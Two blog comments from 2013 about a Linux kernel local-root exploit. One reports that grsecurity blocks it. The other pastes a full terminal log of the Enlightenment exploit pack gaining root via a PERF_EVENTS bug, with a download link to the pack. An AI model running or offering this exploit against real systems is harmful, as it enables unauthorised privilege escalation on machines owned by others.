2 Comments

  1. says:

    May 17, 2013 at 12:02 pm

    Same here, I’m running a hardened gentoo with grsec enabled, and the exploit fails.
    Thanks to the gentoo hardened team for all the work because it is really great !

  2. says:

    May 27, 2013 at 10:13 am

    I tried the semtex exploit on a few boxes – didn’t see one work.
    When I tried the Enlightenment abacus version of it though, bam. GotRoot.

    id
    uid=1000(test_user) gid=1000(test_user) groups=1000(test_user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
    test_user@officenas:/enlightenment$ ./run_nonnull_exploits.sh
    Compiling exp_abacus.c…OK.
    Compiling exp_cheddarbay.c…OK.
    Compiling exp_ingom0wnar.c…OK.
    Compiling exp_moosecox.c…OK.
    Compiling exp_paokara.c…OK.
    Compiling exp_powerglove.c…OK.
    Compiling exp_sieve.c…OK.
    Compiling exp_therebel.c…OK.
    Compiling exp_vmware.c…failed.
    Compiling exp_wunderbar.c…OK.
    Choose your exploit:
    [0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root
    [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
    [2] Sieve: Linux 2.6.18+ move_pages() infoleak
    [3] Exit
    > 0
    ——————————————————————————
    In art, rebellion is consummated and perpetuated in the act of real
    creation, not in criticism or commentary. –Camus
    ——————————————————————————
    [+] Resolved set_fs_root to 0xffffffff8111b98f
    [+] Resolved set_fs_pwd to 0xffffffff8111b9ee
    [+] Resolved __virt_addr_valid to 0xffffffff81030c68
    [+] Resolved init_task to 0xffffffff8160d020 (via System.map)
    [+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)
    [+] Resolved default_exec_domain to 0xffffffff81617600 (via System.map)
    [+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)
    [+] Resolved bad_file_aio_read to 0xffffffff8110da64
    [+] Resolved selinux_enforcing to 0xffffffff817ebb38 (via System.map)
    [+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)
    [+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)
    [+] Resolved security_ops to 0xffffffff817ea2f0 (via System.map)
    [+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)
    [+] Resolved sel_read_enforce to 0xffffffff8116b410
    [+] Resolved audit_enabled to 0xffffffff817b10fc (via System.map)
    [+] Resolved commit_creds to 0xffffffff81063f0e
    [+] Resolved prepare_kernel_cred to 0xffffffff810641c7
    [+] Resolved xen_start_info to 0xffffffff8172ed38 (via System.map)
    [+] Resolved ptmx_fops to 0xffffffff817f8f60 (via System.map)
    [+] Resolved mark_rodata_ro to 0xffffffff8102dc7f
    [+] Resolved set_kernel_text_ro to 0xffffffff8102dc4d
    [+] Resolved make_lowmem_page_readonly to 0xffffffff8100622f
    [+] Resolved make_lowmem_page_readwrite to 0xffffffff81006263
    [!] Array base is 0xffffffff817dbb00
    [!] Detected structure size of 4 bytes
    [!] Targeting 0xffffffff8172d048
    [+] Got ring0!
    [+] Adjusted from interrupt handler to process context
    [+] Detected 2.6/3.x style 8k stacks, with current at 0xffff880214135850 and cred support
    [+] Disabled security of : nothing, what an insecure machine!
    [+] Found ->fs offset at 0×478
    [+] Broke out of any chroots or mnt namespaces
    [+] Got root!
    root@officenas:/enlightenment#id
    uid=0(root) gid=0(root) groups=0(root)

    Enlightenment can be found here – http://grsecurity.net/~spender/exploits/enlightenment.tgz

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>